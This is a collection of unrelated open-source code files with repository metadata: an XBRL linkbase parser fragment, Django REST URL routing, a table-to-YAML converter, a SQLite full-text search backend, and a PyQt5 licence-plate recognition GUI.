if (XBRLDT_NS + "weight") in arc_element.attrib else None
arc_context_element: str = arc_element.attrib[XBRLDT_NS + "contextElement"] if \
(XBRLDT_NS + "contextElement") in arc_element.attrib else None
# Needed for calculationArc
arc_weight: float = float(arc_element.attrib["weight"]) if "weight" in arc_element.attrib else None
# Needed for presentationArc
arc_priority: int = int(arc_element.attrib["priority"]) if "priority" in arc_element.attrib else None
arc_preferred_label: str = arc_element.attrib[
"preferredLabel"] if "preferredLabel" in arc_element.attrib else None
# Create the arc object based on the current linkbase type
arc_object: AbstractArcElement
if linkbase_type == LinkbaseType.DEFINITION:
arc_object = DefinitionArc(
locator_map[arc_from], locator_map[arc_to], arc_role, arc_order, arc_closed,
arc_context_element)
elif linkbase_type == LinkbaseType.CALCULATION:
arc_object = CalculationArc(locator_map[arc_from], locator_map[arc_to], arc_order, arc_weight)
elif linkbase_type == LinkbaseType.PRESENTATION:
arc_object = PresentationArc(locator_map[arc_from], locator_map[arc_to], arc_order, arc_priority,
arc_preferred_label)
else:
# find all labels that are referenced by this arc.
# These where preprocessed previously, so we can just take them
arc_object = LabelArc(locator_map[arc_from], arc_order, label_map[arc_to])
# Build the hierarchy for the Locators.
if linkbase_type != LinkbaseType.LABEL:
# This does not work for label linkbase, since link:labelArcs only link to link:labels
# and not to other locators!!
locator_map[arc_to].parents.append(locator_map[arc_from])
locator_map[arc_from].children.append(arc_object)
# find the top elements of the three (all elements that have no parents)
root_locators = []
for locator in locator_map.values():
if len(locator.parents) == 0:
root_locators.append(locator)
# only add the extended link to the linkbase if the link references a role
# (some filers have empty links in which we are not interested:
# <definitionLink xlink:type="extended" xlink:role="http://www.xbrl.org/2003/role/link"/>)
if extended_link_role in role_refs:
extended_links.append(
ExtendedLink(extended_link_role, role_refs[extended_link_role], root_locators))
elif linkbase_type == LinkbaseType.LABEL:
extended_links.append(ExtendedLink(extended_link_role, None, root_locators))
return Linkbase(extended_links, linkbase_type, linkbase_url if linkbase_url else linkbase_path)
| manusimidt/py-xbrl | xbrl/linkbase.py | linkbase.py | py | 27,220 | python | en | code | 78 | github-code | 36 | [
{
"api_name": "enum.Enum",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "abc.ABC",
"line_number": 54,
"usage_type": "name"
},
{
"api_name": "abc.abstractmethod",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "abc.ABC",
"line_number"... |
74816953384 | from django.urls import include, path
from rest_framework import routers
from . import views
# def router robi za nas widoki generowane przez nasz viewset; tworzy do nich ścieżki
router = routers.DefaultRouter()
router.register('categories', views.CategoryViewSet)
router.register('rooms', views.RoomViewSet)
router.register('plants', views.PlantViewSet)
urlpatterns = [
path('', include(router.urls)),
]
| BParaszczak/plant_manager | plants/urls.py | urls.py | py | 413 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.routers.DefaultRouter",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "rest_framework.routers",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "django.urls.path",
"line_number": 12,
"usage_type": "call"
},
{
"api_na... |
15972612873 | #!/usr/bin/env python3
__doc__ = """Process a dump from the 'Charge Activity Report by Employee
- Project Detail Information' report from Webwise. We only need the
table view because we simply want to extract the fields. For this to
work, we _must_ have the table headers. Those are used as the keys in
the YAML formatting.
"""
import argparse
import datetime
import os
import re
import yaml
_reference_format = """ - title: {Project Title}
project: {Project}
contract: {Contract No}
sponsor: {Sponsor}
PD:
project: {PD of Project}
subtask: {PD of Subtask}
role: '[Program manager, P.D./P.I., Co-P.I./P.D. Task leader]'
budget: '[Did Candidate have budgetary authority?]'
subtask: {Subtask Title}
amount-funded:
task: {Budget of Subtask}
project: {Funded Amount includes Fee}
number-supervised: '[15 (3 PRE, 1 SRE, 1 REII, 1 RE1, 9 students)]'
performance:
project:
- year: {Contract Start Date.year}
month: {Contract Start Date.month}
day: {Contract Start Date.day}
- year: {Contract End Date.year}
month: {Contract End Date.month}
day: {Contract End Date.day}
candidate:
- year: {Employee First Month Worked on Project.year}
month: {Employee First Month Worked on Project.month}
day: {Employee First Month Worked on Project.day}
- year: {Employee Last Month Worked on Project.year}
month: {Employee Last Month Worked on Project.month}
day: {Employee Last Month Worked on Project.day}
hours-worked: {Total Hours Worked}
contributions: '[Briefly describe you contributions in 2--3 sentences.]'
"""
# These were part of an attempt to update a reference YAML with new
# information from the table, but I think that's going to take too much
# effort. Maybe we'll do that, but not now.
# _empty_row = {
# "title" : "",
# "project" : "",
# "contract" : "",
# "sponsor" : "",
# "PD-project" : "",
# "PD-subtask" : "",
# "role" : "'[Program manager, P.D./P.I., Co-P.I./P.D. Task leader]'",
# "budget" : "'[Did Candidate have budgetary authority?]'",
# "subtask" : "",
# "amount-funded-task" : "",
# "amount-funded-project" : "",
# "number-supervised" : "'[15 (3 PRE, 1 SRE, 1 REII, 1 RE1, 9 students)]'",
# "contract-start" : None,
# "contract-end" : None,
# "candidate-start" : None,
# "candidate-end" : None,
# "hour-worked" : "",
# "contributions" : "'[Briefly describe you contributions in 2--3 sentences.]'",
# }
# _from_to_keys = (
# ("Project Title", "title"),
# ("Project", "project"),
# ("Contract No", "contract"),
# ("Sponsor", "sponsor"),
# ("PD of Project", "pd-project"),
# ("PD of Subtask", "pd-subtask"),
# ("Subtask Title", "subtask"),
# ("Budget of Subtask", "amount-funded-task"),
# ("Funded Amount includes Fee", "amount-funded-project"),
# ("Contract Start Date", "contract-start"),
# ("Contract End Date", "contract-end"),
# ("Employee First Month Worked on Project", "candidate-start"),
# ("Employee Last Month Worked on Project", "candidate-end"),
# ("Total Hours Worked", "hour-worked"),
# )
# This is the worked out regular expression for copying the vita
# view over. All of the information is in the table and it's easier
# to parse that. But I don't want to loose the careful work I did
# to figure this out.
# pattern = re.compile(r"\s*\d+\s*" \
# + r"Project\s*Title\s*(?P<title>[-&\w\s]+)" \
# + r"Contract\s*No(?:[.]|umber)\s*(?P<contract>[\w-]*)\s*" \
# + r"Sponsor\s*(?P<sponsor>[-&\w/\s]+)\s*" \
# + r"P[.]\s*I[.]\s*(?P<pi>[\w,\s]+)" \
# + r"Candidate['’]s\s+Role\s*(?P<role>[\w\s-]*)" \
# + r"Budgetary\s*Authority[?]\s*(?P<budget>\w*)\s*" \
# + r"Subtask\s*Title[?]?\s*(?P<subtask>[-&\w\s]*)" \
# + r"Amount\s*Funded\s*for\s*Task:?\s*(?P<task_amount>\$[\d,.]+)?\s*" \
# + r"Amount\s*Funded\s*for\s*Project:?\s*(?P<project_amount>\$[\d,.]+)?\s*" \
# + r"Number\s*and\s*Rank\s*of\s*Persons\s*Supervised:?\s*(?P<supervised>[\w\s]*)" \
# + r"Period\s*of\s*Performance\s*\(Project\):?\s*(?P<project_performance>[-/\d\s]*)" \
# + r"Period\s*of\s*Performance\s*\(Candidate\):?\s*(?P<candidate_performance>[-/\d\s]*)" \
# + r"Contributions:?\s*(?P<contributions>\w|\s)*"
# )
# We define two entries as the same if they have the same entries
# same_entry = lambda l, r: all(l[k] == r[k] for k in ("title",
# "subtask",
# "contract"))
if __name__ == "__main__":
prog, _ = os.path.splitext(".".join(__file__.split(os.sep)[-3:]))
parser = argparse.ArgumentParser(prog=prog, description=__doc__)
parser.add_argument("-o", "--output", default="-",
type=argparse.FileType("w"),
help="Output file")
parser.add_argument("table", type=argparse.FileType("r"),
help="Input table view")
args = parser.parse_args()
keys = [k.strip() for k in args.table.readline().split("\t")]
# Sanitize the bad lines that start with a tab. This is most likely
# due to the poor formatting or bad copy/paste.
lines = []
for line in args.table.readlines():
if line.startswith("\t") and len(lines) > 0:
lines[-1] = lines[-1][:-len(os.linesep)] + line
else:
lines.append(line)
func = lambda k, x: datetime.datetime.strptime(x, "%m/%d/%Y") \
if k in keys[-4:] else x
args.output.write("projects:\n")
for line in lines:
row = {k:func(k, e.strip())
for k, e in zip(keys, line.split("\t"))}
args.output.write(_reference_format.format(**row))
| kprussing/resume | projects-import.py | projects-import.py | py | 6,217 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.splitext",
"line_number": 116,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 116,
"usage_type": "attribute"
},
{
"api_name": "os.sep",
"line_number": 116,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser"... |
37738312088 | # -*- coding: utf-8 -*-
from collections import defaultdict
import struct
from sqlalchemy.sql.expression import text
from ambry.orm.dataset import Dataset
from ambry.library.search_backends.base import BaseDatasetIndex, BasePartitionIndex,\
BaseIdentifierIndex, BaseSearchBackend, IdentifierSearchResult,\
DatasetSearchResult, PartitionSearchResult, SearchTermParser
from ambry.util import get_logger
import logging
logger = get_logger(__name__, propagate=False)
#logger.setLevel(logging.DEBUG)
class SQLiteSearchBackend(BaseSearchBackend):
def _get_dataset_index(self):
""" Returns dataset index. """
# returns initialized dataset index
return DatasetSQLiteIndex(backend=self)
def _get_partition_index(self):
""" Returns partition index. """
return PartitionSQLiteIndex(backend=self)
def _get_identifier_index(self):
""" Returns identifier index. """
return IdentifierSQLiteIndex(backend=self)
def _and_join(self, terms):
""" AND join of the terms.
Args:
terms (list):
Examples:
self._and_join(['term1', 'term2'])
Returns:
str
"""
if len(terms) > 1:
return ' '.join([self._or_join(t) for t in terms])
else:
return self._or_join(terms[0])
class DatasetSQLiteIndex(BaseDatasetIndex):
def __init__(self, backend=None):
assert backend is not None, 'backend argument can not be None.'
super(self.__class__, self).__init__(backend=backend)
logger.debug('Creating dataset FTS table.')
query = """\
CREATE VIRTUAL TABLE IF NOT EXISTS dataset_index USING fts3(
vid VARCHAR(256) NOT NULL,
title TEXT,
keywords TEXT,
doc TEXT
);
"""
self.backend.library.database.connection.execute(query)
def _make_query_from_terms(self, terms):
""" Creates a query for dataset from decomposed search terms.
Args:
terms (dict or unicode or string):
Returns:
tuple of (str, dict): First element is str with FTS query, second is parameters of the query.
"""
match_query = ''
expanded_terms = self._expand_terms(terms)
if expanded_terms['doc']:
match_query = self.backend._or_join(expanded_terms['doc'])
if expanded_terms['keywords']:
if match_query:
match_query += self.backend._and_join(
match_query, self.backend._join_keywords(expanded_terms['keywords']))
else:
match_query = self.backend._join_keywords(expanded_terms['keywords'])
query = text("""
SELECT vid, rank(matchinfo(dataset_index)) AS score
FROM dataset_index
WHERE dataset_index MATCH :match_query
ORDER BY score DESC;
""")
query_params = {
'match_query': match_query}
return query, query_params
def search(self, search_phrase, limit=None):
""" Finds datasets by search phrase.
Args:
search_phrase (str or unicode):
limit (int, optional): how many results to return. None means without limit.
Returns:
list of DatasetSearchResult instances.
"""
# SQLite FTS can't find terms with `-`, therefore all hyphens were replaced with underscore
# before save. Now to get appropriate result we need to replace all hyphens in the search phrase.
# See http://stackoverflow.com/questions/3865733/how-do-i-escape-the-character-in-sqlite-fts3-queries
search_phrase = search_phrase.replace('-', '_')
query, query_params = self._make_query_from_terms(search_phrase)
self._parsed_query = (query, query_params)
connection = self.backend.library.database.connection
# Operate on the raw connection
connection.connection.create_function('rank', 1, _make_rank_func((1., .1, 0, 0)))
logger.debug('Searching datasets using `{}` query.'.format(query))
results = connection.execute(query,
**query_params).fetchall() # Query on the Sqlite proxy to the raw connection
datasets = defaultdict(DatasetSearchResult)
for result in results:
vid, score = result
datasets[vid] = DatasetSearchResult()
datasets[vid].vid = vid
datasets[vid].b_score = score
logger.debug('Extending datasets with partitions.')
for partition in self.backend.partition_index.search(search_phrase):
datasets[partition.dataset_vid].p_score += partition.score
datasets[partition.dataset_vid].partitions.add(partition)
return list(datasets.values())
def list_documents(self, limit=None):
""" Generates vids of all indexed datasets.
Args:
limit (int, optional): If not empty, the maximum number of results to return
Generates:
str: vid of the dataset.
"""
limit_str = ''
if limit:
try:
limit_str = 'LIMIT {}'.format(int(limit))
except (TypeError, ValueError):
pass
query = ('SELECT vid FROM dataset_index ' + limit_str)
for row in self.backend.library.database.connection.execute(query).fetchall():
yield row['vid']
def _as_document(self, dataset):
""" Converts dataset to document indexed by to FTS index.
Args:
dataset (orm.Dataset): dataset to convert.
Returns:
dict with structure matches to BaseDatasetIndex._schema.
"""
assert isinstance(dataset, Dataset)
doc = super(self.__class__, self)._as_document(dataset)
# SQLite FTS can't find terms with `-`, replace it with underscore here and while searching.
# See http://stackoverflow.com/questions/3865733/how-do-i-escape-the-character-in-sqlite-fts3-queries
doc['keywords'] = doc['keywords'].replace('-', '_')
doc['doc'] = doc['doc'].replace('-', '_')
doc['title'] = doc['title'].replace('-', '_')
return doc
def _index_document(self, document, force=False):
""" Adds document to the index. """
query = text("""
INSERT INTO dataset_index(vid, title, keywords, doc)
VALUES(:vid, :title, :keywords, :doc);
""")
self.backend.library.database.connection.execute(query, **document)
def reset(self):
""" Drops index table. """
query = """
DROP TABLE dataset_index;
"""
self.backend.library.database.connection.execute(query)
def _delete(self, vid=None):
""" Deletes given dataset from index.
Args:
vid (str): dataset vid.
"""
query = text("""
DELETE FROM dataset_index
WHERE vid = :vid;
""")
self.backend.library.database.connection.execute(query, vid=vid)
def is_indexed(self, dataset):
""" Returns True if dataset is already indexed. Otherwise returns False. """
query = text("""
SELECT vid
FROM dataset_index
WHERE vid = :vid;
""")
result = self.backend.library.database.connection.execute(query, vid=dataset.vid)
return bool(result.fetchall())
def all(self):
""" Returns list with all indexed datasets. """
datasets = []
query = text("""
SELECT vid
FROM dataset_index;""")
for result in self.backend.library.database.connection.execute(query):
res = DatasetSearchResult()
res.vid = result[0]
res.b_score = 1
datasets.append(res)
return datasets
class IdentifierSQLiteIndex(BaseIdentifierIndex):
def __init__(self, backend=None):
assert backend is not None, 'backend argument can not be None.'
super(self.__class__, self).__init__(backend=backend)
logger.debug('Creating identifier FTS table.')
query = """\
CREATE VIRTUAL TABLE IF NOT EXISTS identifier_index USING fts3(
identifier VARCHAR(256) NOT NULL,
type VARCHAR(256) NOT NULL,
name TEXT
);
"""
self.backend.library.database.connection.execute(query)
def search(self, search_phrase, limit=None):
""" Finds identifiers by search phrase.
Args:
search_phrase (str or unicode):
limit (int, optional): how many results to return. None means without limit.
Returns:
list of IdentifierSearchResult instances.
"""
query_parts = [
'SELECT identifier, type, name, 0',
'FROM identifier_index',
'WHERE name MATCH :part']
query_params = {
'part': '*{}*'.format(search_phrase)}
query_parts.append('ORDER BY name')
if limit:
query_parts.append('LIMIT :limit')
query_params['limit'] = limit
query_parts.append(';')
query = text('\n'.join(query_parts))
results = self.backend.library.database.connection.execute(query, **query_params).fetchall()
for result in results:
vid, type, name, score = result
yield IdentifierSearchResult(
score=score, vid=vid,
type=type, name=name)
def list_documents(self, limit=None):
""" Generates vids of all indexed identifiers.
Args:
limit (int, optional): If not empty, the maximum number of results to return
Generates:
str: vid of the document.
"""
limit_str = ''
if limit:
try:
limit_str = 'LIMIT {}'.format(int(limit))
except (TypeError, ValueError):
pass
query = ('SELECT identifier FROM identifier_index ' + limit_str)
for row in self.backend.library.database.connection.execute(query).fetchall():
yield row['identifier']
def _index_document(self, identifier, force=False):
""" Adds identifier document to the index. """
query = text("""
INSERT INTO identifier_index(identifier, type, name)
VALUES(:identifier, :type, :name);
""")
self.backend.library.database.connection.execute(query, **identifier)
def reset(self):
""" Drops index table. """
query = """
DROP TABLE identifier_index;
"""
self.backend.library.database.connection.execute(query)
def _delete(self, identifier=None):
""" Deletes given identifier from index.
Args:
identifier (str): identifier of the document to delete.
"""
query = text("""
DELETE FROM identifier_index
WHERE identifier = :identifier;
""")
self.backend.library.database.connection.execute(query, identifier=identifier)
def is_indexed(self, identifier):
""" Returns True if identifier is already indexed. Otherwise returns False. """
query = text("""
SELECT identifier
FROM identifier_index
WHERE identifier = :identifier;
""")
result = self.backend.library.database.connection.execute(query, identifier=identifier['identifier'])
return bool(result.fetchall())
def all(self):
""" Returns list with all indexed identifiers. """
identifiers = []
query = text("""
SELECT identifier, type, name
FROM identifier_index;""")
for result in self.backend.library.database.connection.execute(query):
vid, type_, name = result
res = IdentifierSearchResult(
score=1, vid=vid, type=type_, name=name)
identifiers.append(res)
return identifiers
class PartitionSQLiteIndex(BasePartitionIndex):
def __init__(self, backend=None):
assert backend is not None, 'backend argument can not be None.'
super(self.__class__, self).__init__(backend=backend)
logger.debug('Creating partition FTS table.')
query = """\
CREATE VIRTUAL TABLE IF NOT EXISTS partition_index USING fts3(
vid VARCHAR(256) NOT NULL,
dataset_vid VARCHAR(256) NOT NULL,
from_year INTEGER,
to_year INTEGER,
title TEXT,
keywords TEXT,
doc TEXT
);
"""
self.backend.library.database.connection.execute(query)
def search(self, search_phrase, limit=None):
""" Finds partitions by search phrase.
Args:
search_phrase (str or unicode):
limit (int, optional): how many results to generate. None means without limit.
Generates:
PartitionSearchResult instances.
"""
# SQLite FTS can't find terms with `-`, therefore all hyphens replaced with underscore before save.
# Now to make proper query we need to replace all hyphens in the search phrase.
# See http://stackoverflow.com/questions/3865733/how-do-i-escape-the-character-in-sqlite-fts3-queries
search_phrase = search_phrase.replace('-', '_')
terms = SearchTermParser().parse(search_phrase)
from_year = terms.pop('from', None)
to_year = terms.pop('to', None)
query, query_params = self._make_query_from_terms(terms)
self._parsed_query = (query, query_params)
connection = self.backend.library.database.connection
connection.connection.create_function('rank', 1, _make_rank_func((1., .1, 0, 0)))
# SQLite FTS implementation does not allow to create indexes on FTS tables.
# see https://sqlite.org/fts3.html 1.5. Summary, p 1:
# ... it is not possible to create indices ...
#
# So, filter years range here.
results = connection.execute(query, query_params).fetchall()
for result in results:
vid, dataset_vid, score, db_from_year, db_to_year = result
if from_year and from_year < db_from_year:
continue
if to_year and to_year > db_to_year:
continue
yield PartitionSearchResult(
vid=vid, dataset_vid=dataset_vid, score=score)
def list_documents(self, limit=None):
""" Generates vids of all indexed partitions.
Args:
limit (int, optional): If not empty, the maximum number of results to return
Generates:
str: vid of the document.
"""
limit_str = ''
if limit:
try:
limit_str = 'LIMIT {}'.format(int(limit))
except (TypeError, ValueError):
pass
query = ('SELECT vid FROM partition_index ' + limit_str)
for row in self.backend.library.database.connection.execute(query).fetchall():
yield row['vid']
def _as_document(self, partition):
""" Converts partition to document indexed by to FTS index.
Args:
partition (orm.Partition): partition to convert.
Returns:
dict with structure matches to BasePartitionIndex._schema.
"""
doc = super(self.__class__, self)._as_document(partition)
# SQLite FTS can't find terms with `-`, replace it with underscore here and while searching.
# See http://stackoverflow.com/questions/3865733/how-do-i-escape-the-character-in-sqlite-fts3-queries
doc['keywords'] = doc['keywords'].replace('-', '_')
doc['doc'] = doc['doc'].replace('-', '_')
doc['title'] = doc['title'].replace('-', '_')
# pass time_coverage to the _index_document.
doc['time_coverage'] = partition.time_coverage
return doc
def _make_query_from_terms(self, terms):
""" Creates a query for partition from decomposed search terms.
Args:
terms (dict or unicode or string):
Returns:
tuple of (str, dict): First element is str with FTS query, second is parameters of the query.
"""
match_query = ''
expanded_terms = self._expand_terms(terms)
if expanded_terms['doc']:
match_query = self.backend._and_join(expanded_terms['doc'])
if expanded_terms['keywords']:
if match_query:
match_query = self.backend._and_join(
[match_query, self.backend._join_keywords(expanded_terms['keywords'])])
else:
match_query = self.backend._join_keywords(expanded_terms['keywords'])
if match_query:
query = text("""
SELECT vid, dataset_vid, rank(matchinfo(partition_index)) AS score, from_year, to_year
FROM partition_index
WHERE partition_index MATCH :match_query
ORDER BY score DESC;
""")
query_params = {
'match_query': match_query}
else:
query = text("""
SELECT vid, dataset_vid, rank(matchinfo(partition_index)), from_year, to_year AS score
FROM partition_index""")
query_params = {}
return query, query_params
def _index_document(self, document, force=False):
""" Adds parition document to the index. """
from ambry.util import int_maybe
time_coverage = document.pop('time_coverage', [])
from_year = None
to_year = None
if time_coverage:
from_year = int_maybe(time_coverage[0])
to_year = int_maybe(time_coverage[-1])
query = text("""
INSERT INTO partition_index(vid, dataset_vid, title, keywords, doc, from_year, to_year)
VALUES(:vid, :dataset_vid, :title, :keywords, :doc, :from_year, :to_year); """)
self.backend.library.database.connection.execute(
query, from_year=from_year, to_year=to_year, **document)
def reset(self):
""" Drops index table. """
query = """
DROP TABLE partition_index;
"""
self.backend.library.database.connection.execute(query)
def _delete(self, vid=None):
""" Deletes partition with given vid from index.
Args:
vid (str): vid of the partition document to delete.
"""
query = text("""
DELETE FROM partition_index
WHERE vid = :vid;
""")
self.backend.library.database.connection.execute(query, vid=vid)
def is_indexed(self, partition):
""" Returns True if partition is already indexed. Otherwise returns False. """
query = text("""
SELECT vid
FROM partition_index
WHERE vid = :vid;
""")
result = self.backend.library.database.connection.execute(query, vid=partition.vid)
return bool(result.fetchall())
def all(self):
""" Returns list with vids of all indexed partitions. """
partitions = []
query = text("""
SELECT dataset_vid, vid
FROM partition_index;""")
for result in self.backend.library.database.connection.execute(query):
dataset_vid, vid = result
partitions.append(PartitionSearchResult(dataset_vid=dataset_vid, vid=vid, score=1))
return partitions
def _make_rank_func(weights):
def rank(matchinfo):
# matchinfo is defined as returning 32-bit unsigned integers
# in machine byte order
# http://www.sqlite.org/fts3.html#matchinfo
# and struct defaults to machine byte order
matchinfo = struct.unpack('I' * int(len(matchinfo) / 4), matchinfo)
it = iter(matchinfo[2:])
return sum(x[0] * w / x[1]
for x, w in zip(list(zip(it, it, it)), weights)
if x[1])
return rank
| CivicSpleen/ambry | ambry/library/search_backends/sqlite_backend.py | sqlite_backend.py | py | 20,150 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "ambry.util.get_logger",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "ambry.library.search_backends.base.BaseSearchBackend",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "ambry.library.search_backends.base.BaseDatasetIndex",
"line_number... |
6240147202 | #
# SAKARYA ÜNİVERSİTESİ BİLGİSAYAR VE BİLİŞİM BİLİMLERİ FAKÜLTESİ
# BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ
# BİLGİSAYAR MÜHENDİSLİĞİ TASARIMI - 2. ÖĞRETİM P GRUBU
# EDA NUR KARAMUK - G181210061 & ELİF RUMEYSA AYDIN - G181210031
#
#
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QFileDialog
from PyQt5.QtGui import QImage, QPixmap
import cv2, imutils
import sqlite3 as sql
import os
os.system('python Connection.py')
os.system('python CreateTable.py')
from PlateRecognitionAlgorithm import plateRecognize
from PlateRecords import Ui_SecondWindow
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1065, 594)
MainWindow.setAutoFillBackground(False)
MainWindow.setStyleSheet("background-color: rgb(226, 226, 226);")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("Icon/car.png"), QtGui.QIcon.Selected, QtGui.QIcon.On)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.plate_result = QtWidgets.QGroupBox(self.centralwidget)
self.plate_result.setGeometry(QtCore.QRect(550, 10, 481, 551))
font = QtGui.QFont()
font.setPointSize(12)
self.plate_result.setFont(font)
self.plate_result.setStyleSheet("background-color: rgb(235, 235, 235);")
self.plate_result.setObjectName("plate_result")
self.label_PlateResult = QtWidgets.QLabel(self.plate_result)
self.label_PlateResult.setGeometry(QtCore.QRect(10, 40, 461, 351))
self.label_PlateResult.setStyleSheet("background-color: rgb(200, 200, 200);")
self.label_PlateResult.setText("")
self.label_PlateResult.setAlignment(QtCore.Qt.AlignCenter)
self.label_PlateResult.setObjectName("label_PlateResult")
self.textPlateResult = QtWidgets.QTextEdit(self.plate_result)
self.textPlateResult.setGeometry(QtCore.QRect(10, 400, 271, 61))
font = QtGui.QFont()
font.setPointSize(16)
self.textPlateResult.setFont(font)
self.textPlateResult.setStyleSheet("background-color: rgb(255, 255, 255);")
self.textPlateResult.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.textPlateResult.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.textPlateResult.setReadOnly(True)
self.textPlateResult.setObjectName("textPlateResult")
self.textEdit = QtWidgets.QTextEdit(self.plate_result)
self.textEdit.setGeometry(QtCore.QRect(10, 480, 271, 51))
font = QtGui.QFont()
font.setPointSize(10)
self.textEdit.setFont(font)
self.textEdit.setReadOnly(True)
self.textEdit.setObjectName("textEdit")
self.btnCheckPlateNumber = QtWidgets.QPushButton(self.plate_result)
self.btnCheckPlateNumber.setGeometry(QtCore.QRect(290, 400, 181, 61))
font = QtGui.QFont()
font.setPointSize(11)
self.btnCheckPlateNumber.setFont(font)
self.btnCheckPlateNumber.setStyleSheet("background-color: rgb(79, 79, 79);\n"
"color: rgb(255, 255, 255);")
self.btnCheckPlateNumber.setIconSize(QtCore.QSize(30, 30))
self.btnCheckPlateNumber.setObjectName("btnCheckPlateNumber")
self.btnShowPlateRecords = QtWidgets.QPushButton(self.plate_result)
self.btnShowPlateRecords.setGeometry(QtCore.QRect(290, 480, 181, 51))
font = QtGui.QFont()
font.setPointSize(11)
self.btnShowPlateRecords.setFont(font)
self.btnShowPlateRecords.setStyleSheet("background-color: rgb(79, 79, 79);\n"
"color: rgb(255, 255, 255);")
self.btnShowPlateRecords.setIconSize(QtCore.QSize(30, 30))
self.btnShowPlateRecords.setObjectName("btnShowPlateRecords")
self.vehicle_plate = QtWidgets.QGroupBox(self.centralwidget)
self.vehicle_plate.setGeometry(QtCore.QRect(30, 10, 481, 551))
font = QtGui.QFont()
font.setPointSize(12)
self.vehicle_plate.setFont(font)
self.vehicle_plate.setStyleSheet("background-color: rgb(235, 235, 235);")
self.vehicle_plate.setObjectName("vehicle_plate")
self.startPlateRecognition = QtWidgets.QPushButton(self.vehicle_plate)
self.startPlateRecognition.setGeometry(QtCore.QRect(250, 430, 211, 51))
font = QtGui.QFont()
font.setPointSize(11)
self.startPlateRecognition.setFont(font)
self.startPlateRecognition.setStyleSheet("background-color: rgb(79, 79, 79);\n"
"color: rgb(255, 255, 255);")
self.startPlateRecognition.setIconSize(QtCore.QSize(30, 30))
self.startPlateRecognition.setObjectName("startPlateRecognition")
self.labelVehicle = QtWidgets.QLabel(self.vehicle_plate)
self.labelVehicle.setGeometry(QtCore.QRect(10, 30, 461, 351))
self.labelVehicle.setStyleSheet("background-color: rgb(200, 200, 200);")
self.labelVehicle.setText("")
self.labelVehicle.setAlignment(QtCore.Qt.AlignCenter)
self.labelVehicle.setObjectName("labelVehicle")
self.openImageFile = QtWidgets.QPushButton(self.vehicle_plate)
self.openImageFile.setGeometry(QtCore.QRect(20, 430, 211, 51))
font = QtGui.QFont()
font.setPointSize(11)
self.openImageFile.setFont(font)
self.openImageFile.setStyleSheet("background-color: rgb(79, 79, 79);\n"
"color: rgb(255, 255, 255);")
self.openImageFile.setIconSize(QtCore.QSize(30, 30))
self.openImageFile.setObjectName("openImageFile")
self.vehicle_plate.raise_()
self.plate_result.raise_()
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.openImageFile.clicked.connect(self.loadImage)
self.startPlateRecognition.clicked.connect(self.showPlateRecognition)
self.btnShowPlateRecords.clicked.connect(self.openWindow)
self.btnCheckPlateNumber.clicked.connect(self.checkPlateNumber)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
imagePath = ""
def loadImage(self):
""" Bilgisayardan resim seçilmesini sağlayan fonksiyon.
"""
self.filename = QFileDialog.getOpenFileName(filter="Image (*.png *.xmp *.jpg *.jpeg *.webp)")[0]
self.image = cv2.imread(self.filename)
self.setPhoto(self.image)
global imagePath
imagePath = self.image
def setPhoto(self, image):
""" Label bileşeninde resmin yeniden boyutlandırıp gösterilmesini sağlayan fonksiyon.
"""
self.tmp = image
image = imutils.resize(image, width=500)
frame = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = QImage(frame, frame.shape[1], frame.shape[0], frame.strides[0], QImage.Format_RGB888)
self.labelVehicle.setPixmap(QtGui.QPixmap.fromImage(image))
# Plaka Okuma butonuna tıklandığında çalışan fonksiyon.
def showPlateRecognition(self):
self.writePlate(imagePath)
self.showPlateImage(imagePath)
# Plaka Okuma algoritmasında resmin sonuç label üzerinde gösterilmesini sağlayan fonksiyon.
def showPlateImage(self, image):
self.tmp = image
txt, krp = plateRecognize(image)
krp = imutils.resize(krp, width=350)
frame = cv2.cvtColor(krp, cv2.COLOR_BGR2RGB)
krp = QImage(frame, frame.shape[1], frame.shape[0], frame.strides[0], QImage.Format_RGB888)
self.label_PlateResult.setPixmap(QtGui.QPixmap.fromImage(krp))
# Plaka Okuma algoritmasında palaka metninin sonuç textBox'ın üzerinde gösterilmesini sağlayan fonksiyon.
def writePlate(self, image):
txt, krp = plateRecognize(image)
self.textPlateResult.setText(txt)
def openWindow(self):
self.window = QtWidgets.QMainWindow()
self.plateResult = self.textPlateResult.toPlainText()
self.ui = Ui_SecondWindow(self.plateResult)
self.ui.setupUi(self.window)
self.window.show()
def checkPlateNumber(self):
plateNumber = self.textPlateResult.toPlainText()
self.conn = sql.connect("Database/PlateRecognition.db")
self.c = self.conn.cursor()
self.c.execute("SELECT * FROM PlateNumberInformations WHERE plate_number = ?",(plateNumber,))
data = self.c.fetchall()
if len(data) == 0:
self.textEdit.setText("Araç kayıtlı değil.")
else:
self.textEdit.setText("Araç kayıtlı.")
self.conn.commit()
self.c.close()
self.conn.close()
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Plaka Tanıma Sistemi"))
self.plate_result.setTitle(_translate("MainWindow", "Plaka Sonucu"))
self.btnCheckPlateNumber.setText(_translate("MainWindow", "Plakayı Kontrol Et"))
